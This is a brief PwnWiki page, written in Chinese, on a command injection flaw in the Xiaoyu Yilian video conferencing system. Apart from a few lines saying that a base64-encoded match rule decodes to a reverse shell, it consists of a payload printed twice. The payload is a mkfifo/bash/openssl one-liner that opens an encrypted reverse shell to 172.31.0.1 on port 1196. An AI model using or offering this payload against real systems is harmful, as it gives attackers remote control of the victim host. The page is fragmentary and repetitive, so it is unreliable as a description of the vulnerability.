小魚易連視頻會議系統命令注入漏洞
From PwnWiki
描述
特徵發現:匹配規則base64編碼
解碼特徵(存在反彈shell)
Payload
mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect 172.31.0.1:1196 > /tmp/s;rm -f /tmp/s
特徵發現:匹配規則base64編碼
解碼特徵(存在反彈shell)
mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect 172.31.0.1:1196 > /tmp/s;rm -f /tmp/s